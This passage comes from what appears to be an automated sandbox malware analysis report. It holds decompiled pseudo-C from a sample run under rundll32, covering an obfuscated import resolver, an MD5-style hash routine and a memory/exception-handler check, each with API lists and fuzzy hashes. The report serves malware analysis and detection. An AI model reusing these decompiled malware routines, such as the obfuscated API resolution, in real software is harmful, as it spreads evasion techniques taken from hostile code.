							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                0x00401385
                0x0040138e
                0x00401393
                0x00401399
                0x004013a2
                0x004013a8
                0x004013aa
                0x004013ad
                0x004013b2
                0x004013b9
                0x004013b9
                0x004013bd
                0x004013c3
                0x004013c8
                0x00000000
                0x00000000
                0x004013ce
                0x004013d8
                0x004013da
                0x004013dd
                0x004013e0
                0x004013e4
                0x004013ec
                0x004013ee
                0x004013f1
                0x00401459
                0x00401459
                0x0040145d
                0x00000000
                0x00000000
                0x004013f6
                0x004013fc
                0x004013fe
                0x00401411
                0x00401414
                0x00401414
                0x00401414
                0x00401418
                0x00401400
                0x00401400
                0x00401408
                0x0040140a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040140a
                0x004013f8
                0x004013f8
                0x0040140c
                0x0040140c
                0x0040140c
                0x0040141b
                0x0040141e
                0x00401420
                0x00401427
                0x00401422
                0x00401422
                0x00401422
                0x0040142f
                0x00401435
                0x00401437
                0x00401467
                0x00401439
                0x00401439
                0x0040143c
                0x0040143e
                0x00401446
                0x00401446
                0x0040144b
                0x0040144d
                0x00401454
                0x00401456
                0x00401456
                0x00401456
                0x00000000
                0x00401456
                0x00000000
                0x00401437
                0x004013e6
                0x004013e6
                0x004013ea
                0x00000000
                0x00000000
                0x004013ea
                0x0040146a
                0x0040146a
                0x00401471
                0x00401476
                0x00000000
                0x00000000
                0x0040147c
                0x00401487
                0x00000000
                0x00401487
                0x0040147e
                0x0040147e
                0x00401484
                0x00000000
                0x00401484
                0x004013b2
                0x00401488
                0x0040148d

                APIs
                • LoadLibraryA.KERNEL32 ref: 004013BD
                • GetProcAddress.KERNEL32(?,00000000), ref: 0040142F
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID:
                • API String ID: 2574300362-0
                • Opcode ID: 09c8a1ce1e59cb02426f2e5fd1934d1d1e8e4ba64be0f7ffcd113107977e49f2
                • Instruction ID: d5d8a9ff56a5fbd3c39ff80186cfb72a317dee8f78828c4d029b3e502e9a3da9
                • Opcode Fuzzy Hash: 09c8a1ce1e59cb02426f2e5fd1934d1d1e8e4ba64be0f7ffcd113107977e49f2
                • Instruction Fuzzy Hash: 6E313575A01216DBDB14CF99C890AAEB7F8FF44305B24417AD901FB3A0E738EA41CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B939B3 Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 49%
                			E04B939B3(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                0x04b939b6
                0x04b939c1
                0x04b939c4
                0x04b939c7
                0x04b939c8
                0x04b939e6
                0x04b939e8
                0x04b939eb
                0x04b939ee
                0x04b939ee
                0x04b939f1
                0x04b939f1
                0x04b939f4
                0x04b939f4
                0x04b939f7
                0x04b939f7
                0x04b93a14
                0x04b93a17
                0x04b93a2d
                0x04b93a30
                0x04b93a4a
                0x04b93a4d
                0x04b93a63
                0x04b93a66
                0x04b93a68
                0x04b93a80
                0x04b93a83
                0x04b93a86
                0x04b93a9e
                0x04b93aa1
                0x04b93abb
                0x04b93abe
                0x04b93ad4
                0x04b93ad7
                0x04b93ad9
                0x04b93af1
                0x04b93af6
                0x04b93af9
                0x04b93b0f
                0x04b93b12
                0x04b93b2c
                0x04b93b2f
                0x04b93b45
                0x04b93b48
                0x04b93b4a
                0x04b93b65
                0x04b93b68
                0x04b93b7f
                0x04b93b82
                0x04b93b86
                0x04b93b9f
                0x04b93ba2
                0x04b93ba4
                0x04b93ba7
                0x04b93bc2
                0x04b93bc5
                0x04b93bde
                0x04b93be1
                0x04b93bf1
                0x04b93bf4
                0x04b93c0c
                0x04b93c0f
                0x04b93c29
                0x04b93c2c
                0x04b93c44
                0x04b93c47
                0x04b93c5d
                0x04b93c60
                0x04b93c78
                0x04b93c7b
                0x04b93c93
                0x04b93c96
                0x04b93cb0
                0x04b93cb3
                0x04b93cc9
                0x04b93ccc
                0x04b93ce4
                0x04b93ce7
                0x04b93d01
                0x04b93d04
                0x04b93d1c
                0x04b93d1f
                0x04b93d35
                0x04b93d38
                0x04b93d50
                0x04b93d53
                0x04b93d6b
                0x04b93d6e
                0x04b93d80
                0x04b93d83
                0x04b93d95
                0x04b93d98
                0x04b93daa
                0x04b93dad
                0x04b93db1
                0x04b93dc1
                0x04b93dc4
                0x04b93dd2
                0x04b93dd5
                0x04b93de7
                0x04b93dea
                0x04b93dfe
                0x04b93e01
                0x04b93e03
                0x04b93e13
                0x04b93e16
                0x04b93e28
                0x04b93e2b
                0x04b93e39
                0x04b93e3c
                0x04b93e4e
                0x04b93e51
                0x04b93e55
                0x04b93e65
                0x04b93e68
                0x04b93e7a
                0x04b93e7d
                0x04b93e8b
                0x04b93e8e
                0x04b93ea0
                0x04b93ea3
                0x04b93eb5
                0x04b93eb8
                0x04b93ecc
                0x04b93ecf
                0x04b93ee3
                0x04b93ee6
                0x04b93efa
                0x04b93efd
                0x04b93f11
                0x04b93f14
                0x04b93f28
                0x04b93f2b
                0x04b93f3f
                0x04b93f44
                0x04b93f56
                0x04b93f59
                0x04b93f6d
                0x04b93f70
                0x04b93f84
                0x04b93f87
                0x04b93f9d
                0x04b93fa0
                0x04b93fb4
                0x04b93fb7
                0x04b93fc9
                0x04b93fcc
                0x04b93fe0
                0x04b93fe3
                0x04b93ff7
                0x04b93ffa
                0x04b9400e
                0x04b94017
                0x04b9401a
                0x04b94023
                0x04b9402c
                0x04b94034
                0x04b9403c
                0x04b94046
                0x04b9405b

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 0fa6b20996f5fbee30119e22c93400c1527cb528fe5c5e6e3bcf183407d991ed
                • Instruction ID: ed959bca078ea9fa18b4e2381cf1cd3b3d243472c7a27c2d16a0494a5835ac59
                • Opcode Fuzzy Hash: 0fa6b20996f5fbee30119e22c93400c1527cb528fe5c5e6e3bcf183407d991ed
                • Instruction Fuzzy Hash: B922847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B985F1 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B985F1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4b9a380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4b9a3c8 = 1;
										__eflags =  *0x4b9a3c8;
										if( *0x4b9a3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x4b9a380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4b9a3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4b9a380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x4b9a388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4b9a384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x4b9a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4b9a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4b9a3c8 = 1;
							__eflags =  *0x4b9a3c8;
							if( *0x4b9a3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x4b9a388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x4b9a388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4b9a3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x4b9a388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4b9a380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x4b9a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4b9a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                0x04b985fb
                0x04b985fe
                0x04b98604
                0x04b98622
                0x00000000
                0x04b98622
                0x04b9860c
                0x04b98615
                0x04b9861b
                0x04b9862a
                0x04b9862d
                0x04b98630
                0x04b9863a
                0x04b9863a
                0x04b9863c
                0x04b9863f
                0x04b98641
                0x04b98641
                0x04b98643
                0x04b98646
                0x00000000
                0x00000000
                0x04b98648
                0x04b9864a
                0x04b986b0
                0x04b986b0
                0x04b9880e
                0x00000000
                0x04b9880e
                0x04b9864c
                0x04b9864c
                0x04b98650
                0x04b98652
                0x04b98652
                0x04b98652
                0x04b98652
                0x04b98655
                0x04b98656
                0x04b98659
                0x04b98659
                0x04b9865d
                0x04b98661
                0x04b9866f
                0x04b9866f
                0x04b98677
                0x04b9867d
                0x04b9867f
                0x04b98681
                0x04b98691
                0x04b9869e
                0x04b986a2
                0x04b986a7
                0x04b986a9
                0x04b98727
                0x04b98727
                0x04b986ab
                0x04b986ab
                0x04b986ab
                0x04b98729
                0x04b9872b
                0x04b9880c
                0x04b9880c
                0x00000000
                0x04b98731
                0x04b98731
                0x04b98738
                0x00000000
                0x00000000
                0x04b9873e
                0x04b98742
                0x04b9879e
                0x04b987a0
                0x04b987a8
                0x04b987aa
                0x04b987ac
                0x00000000
                0x00000000
                0x04b987ae
                0x04b987b4
                0x04b987b6
                0x04b987b8
                0x04b987cd
                0x04b987cd
                0x04b987cf
                0x04b987fe
                0x04b98805
                0x00000000
                0x04b98805
                0x04b987d3
                0x04b987d4
                0x04b987d6
                0x04b987d8
                0x04b987d8
                0x04b987da
                0x04b987dc
                0x04b987de
                0x04b987f2
                0x04b987f2
                0x04b987f5
                0x04b987f7
                0x04b987f7
                0x04b987f8
                0x04b987f8
                0x00000000
                0x04b987e0
